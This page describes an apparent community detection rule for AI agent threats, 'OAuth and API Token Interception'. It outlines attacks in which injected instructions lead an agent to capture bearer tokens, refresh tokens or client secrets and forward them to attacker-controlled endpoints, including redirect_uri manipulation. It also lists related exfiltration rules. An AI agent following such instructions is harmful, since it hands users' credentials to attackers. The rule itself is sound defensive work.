Skip to content
ATR-2026-00114highContext Exfiltrationexperimental

OAuth and API Token Interception

Detects patterns indicating OAuth token interception, API key forwarding, or authorization header theft. Attackers may instruct agents to capture bearer tokens, refresh tokens, or client secrets and redirect them to attacker-controlled endpoints. This includes suspicious redirect_uri manipulation in OAuth flows and bulk token extraction from agent context.

Severity
high
Category
Context Exfiltration
Scan Target
mcp
Author
ATR Community

Response Actions

alertsnapshot

References

OWASP Agentic
ASI03:2026 - Agent Identity and Access Abuse
View full YAML on GitHub →

More Context Exfiltration Rules

ATR-2026-00020highSystem Prompt and Internal Instruction LeakageATR-2026-00021criticalCredential and Secret Exposure in Agent OutputATR-2026-00075highAgent Memory ManipulationATR-2026-00102highData Exfiltration via Disguised Analytics CollectionATR-2026-00113criticalCredential File Theft from Agent Environment